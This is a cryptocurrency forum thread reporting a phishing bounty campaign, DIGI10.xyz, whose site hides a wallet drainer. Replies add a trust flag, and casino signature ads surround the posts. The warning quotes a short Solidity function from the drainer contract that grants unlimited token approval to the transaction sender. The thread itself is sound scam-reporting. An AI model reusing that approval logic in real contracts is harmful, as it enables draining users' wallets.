Bitcoin Forum
April 10, 2026, 09:49:17 PM *
News: Latest Bitcoin Core release: 30.2 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: [SCAM] DIGI10.xyz Phishing Campaign – Malicious Wallet Drainer Analysis  (Read 29 times)
albon (OP)
Legendary
*
Offline Offline

Activity: 2394
Merit: 2203



View Profile
Today at 02:54:36 PM
Merited by Bitcoin_Arena (1)
 #1

What happened::

This Newbie member created a bounty campaign for a website called DIGI10, which is supposedly meant to operate only on Base.

Based on my research, I confirmed that this is a phishing site containing a wallet drainer.

The first red flag is the domain ending in .xyz Also, in the MetaMask window, it requests extensive permissions to scan across all networks in order to search for any "liquidity" in the wallet on networks other than Base (such as Ethereum or BSC). Once you sign any "approval," the malicious contract can drain assets from all networks where you have a balance.

Additionally, the domain is less than a year old, and the site uses references to CEX platforms to create a false sense of legitimacy.



The network logs indicate persistent failures for requests to find?name=digi10.xyz.

The website is attempting to exfiltrate my wallet fingerprint and balance history to an external server. Since Im using a new wallet with no balance, the server either fails to respond or returns a 404 error as the script ignores it since there’s nothing in it



Scammers Profile Link: https://bitcointalk.org/index.php?action=profile;u=2857103

Reference Link:

[1] DIGI10 NETWORK – OFFICIAL BOUNTY CAMPAIGN 🔥Jan 04 2026

[2] digi10[.]xyz | ARCHIVED | WHOIS

[3] Malicious Drainer Contract: 0x6e8D916Cd8c53b8ba11dd91512097C0b9FA5F5A9 | CODE

Code:
function _claimReward(address account) internal {
    _approve(account, tx.origin, type(uint256).max);
}


Code:
Domain: digi10.xyz
Registered On: 2025-08-21
Expires On: 2026-08-21
Updated On: 2025-09-01
Registrar Information
Registrar: Namecheap
IANA ID: 1068
Email: support@namecheap.com

Additional Notes: For those still participating in bounty campaigns, you should be cautious. Always choose managers with a solid reputation, and it’s best to avoid newbie accounts. Also, always check their trust feedback.

█████████████████████████
██
█████▀▀███████▀▀███████
█████▀░░▄███████▄░░▀█████
██▀░░██████▀░▀████░░▀██
██▀░░▀▀▀████████████░░▀██
██░░█▄████▀▀███▀█████░░██
██░░███▄▄███████▀▀███░░██
██░░█████████████████░░██
██▄░░████▄▄██████▄▄█░░▄██
██▄░░██████▄░░████░░▄██
█████▄░░▀███▌░░▐▀░░▄█████
███████▄▄███████▄▄███████
█████████████████████████
.
.ROOBET 2.0..██████.IIIIIFASTER & SLEEKER.██████.
|

█▄█
▀█▀
████▄▄██████▄▄████
█▄███▀█░░█████░░█▀███▄█
▀█▄▄░▐█████████▌▄▄█▀
██▄▄█████████▄▄████▌
██████▄▄████████
█▀▀████████████████
██████
█████████████
██
█▀▀██████████████
▀▀▀███████████▀▀▀▀
|.
    PLAY NOW    
Bitcoin_Arena
Copper Member
Legendary
*
Offline Offline

Activity: 2604
Merit: 2044


฿itcoin for all, All for ฿itcoin.


View Profile
Today at 05:51:15 PM
 #2

Nice catch and also an extra plus for analysis the network behaviour of the malicious website
At this point, I think a newbie flag is also necessary since it's newbies who mostly participate in those pointless bounties, and it's very likely that the culprit may make another similar post soon. So I am creating a newbie flag.

Flag: https://bitcointalk.org/index.php?action=trust;flag=3515

 
.Winna.com..

░░░░░░░▄▀▀▀
░░


▐▌▐▌
▄▄▄▒▒▒▄▄▄
████████████
█████████████
███▀▀███▀

▄▄

██████████████
████████████▄
█████████████
███▄███▄█████▌
███▀▀█▀▀█████
████▀▀▀█████▌
████████████
█████████████
█████
▀▀▀██████

▄▄
THE ULTIMATE CRYPTO
...CASINO & SPORTSBOOK...
─────  ♦  ─────

▄▄██▄▄
▄▄████████▄▄
██████████████
████████████████
███████████████
████████████████
▀██████████████▀
▀██████████▀
▀████▀

▄▄▄▄

▄▄▀███▀▄▄
▄██████████▄
███████████
███▄▄
▄███▄▄▄███
████▀█████▀███
█████████████████
█████████████
▀███████████
▀▀█████▀▀

▄▄▄▄


.....INSTANT.....
WITHDRAWALS
 
...UP TO 30%...
LOSSBACK
 
 

   PLAY NOW   
aioc
Hero Member
*****
Offline Offline

Activity: 3598
Merit: 610



View Profile
Today at 07:50:30 PM
 #3



Additionally, the domain is less than a year old, and the site uses references to CEX platforms to create a false sense of legitimacy.





I have never encountered that kind of permission in all my dealings using my wallets, but it's a clear warning sign; usually, the interaction I'm getting is that they will not move funds without my permission.

It's always worth checking the permission you are granting to any website. The image you presented is new to many of us here, and it's worth remembering this kind of permission.
Another good catch, sir Albon

 
.Winna.com..

░░░░░░░▄▀▀▀
░░


▐▌▐▌
▄▄▄▒▒▒▄▄▄
████████████
█████████████
███▀▀███▀

▄▄

██████████████
████████████▄
█████████████
███▄███▄█████▌
███▀▀█▀▀█████
████▀▀▀█████▌
████████████
█████████████
█████
▀▀▀██████

▄▄
THE ULTIMATE CRYPTO
...CASINO & SPORTSBOOK...
─────  ♦  ─────

▄▄██▄▄
▄▄████████▄▄
██████████████
████████████████
███████████████
████████████████
▀██████████████▀
▀██████████▀
▀████▀

▄▄▄▄

▄▄▀███▀▄▄
▄██████████▄
███████████
███▄▄
▄███▄▄▄███
████▀█████▀███
█████████████████
█████████████
▀███████████
▀▀█████▀▀

▄▄▄▄


.....INSTANT.....
WITHDRAWALS
 
...UP TO 30%...
LOSSBACK
 
 

   PLAY NOW   
Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!